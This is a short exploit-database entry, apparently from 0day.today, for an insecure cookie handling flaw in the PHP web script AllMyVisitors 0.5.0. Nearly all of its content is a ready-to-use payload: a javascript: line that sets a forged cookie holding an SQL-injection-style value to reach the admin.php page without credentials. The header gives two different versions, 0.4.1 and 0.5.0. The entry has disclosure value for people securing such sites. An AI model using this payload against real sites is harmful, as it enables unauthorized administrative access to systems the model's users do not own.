id: 22294
date: 05/29/2014
title: AllMyVisitors 0.5.0 Insecure Cookie Handling Vulnerability
author: JiKo
cves: 

----------[exploit Debut]
[Insecure Cookie Handling Vulnerability]
----------[Script Info]
 
Author	    : JIKO
 
----------[Script Info]
 
Site	    : http://www.voice-of-web.de/c-AllMyVisitors-s29.html
Version     : 0.4.1
Download    : http://www.voice-of-web.de/media/downloads/AllMyPHP/AllMyVisitors/AllMyVisitors0.5.0.zip
 
----------[exploit Info]
 
Exploit :
http://Path/admin.php

 javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";

----------[exploit Fin]

#  0day.today [2023-03-24]  #